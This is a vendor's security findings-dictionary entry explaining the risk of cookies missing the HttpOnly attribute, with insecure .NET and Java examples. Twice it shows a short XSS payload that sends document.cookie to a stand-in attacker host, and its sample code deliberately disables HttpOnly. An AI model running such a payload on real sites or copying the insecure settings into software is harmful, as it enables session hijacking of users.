AttackFlow Findings Dictionary

Finding A Way To Try AttackFlow Enterprise Edition?

If so, click to download 15 days full version for free!

Missing HttpOnly Cookie Attribute

The attacker may be able to steal session ids or critical cookie values in cleartext by executing Javascript in client’s browser.

Severity

Medium

Fix Cost

Low

Trust Level

High

HttpOnly is first implemented into Internet Explorer 6 by Microsoft in 2002 to protect client’s session ids, traveling through cookies, from stolen by the attacker using javascript utilizing Cross Site Scripting (XSS) vulnerability.

By using XSS if an adversary manages to execute the below Javascript in client’s browser, then he is able to steal the client’s cookies which also contain unique session ids that uniquely identifies the client after authentication.

            
i = new Image();
c = document.cookie;
i.src =  “http://www.attacker.com/steal?c=” + c; 
                    
              

This vulnerability is also called Session Hijacking. There may be two ways of creating cookies containing session identifiers. Here’s the coding style;

            
HttpCookie cookie = new HttpCookie("SessionID", token);
cookie.HttpOnly = false;
Response.Cookies.Add(cookie);
                

And here’s the configuration style;

            
<configuration>
<system.web>
<httpCookies httpOnlyCookies="false">

                

None of the styles include or set HttpOnly attribute on the cookies they formed.

HttpOnly is first implemented into Internet Explorer 6 by Microsoft in 2002 to protect client’s session ids, traveling through cookies, from stolen by the attacker using javascript utilizing Cross Site Scripting (XSS) vulnerability.

By using XSS if an adversary manages to execute the below Javascript in client’s browser, then he is able to steal the client’s cookies which also contain unique session ids that uniquely identifies the client after authentication.

            
i = new Image();
c = document.cookie;
i.src =  “http://www.attacker.com/steal?c=” + c; 
                   

This vulnerability is also called Session Hijacking. There may be two ways of creating cookies containing session identifiers. Here’s the coding style;

            
Cookie cookie = new Cookie("mycookie");
cookie.setValue("myvalue");
cookie.setHttpOnly(false);
response.addCookie(userCookie);
                

And here’s the configuration style in web.xml for session cookies for Servlet 3.0 and upwards;


<session-config>
<cookie-config>
<http-only>false</http-only>
</cookie-config>
</session-config>


Finding A Way To Purchase AttackFlow Enterprise Edition?

If so, click to buy now for yearly subscriptions!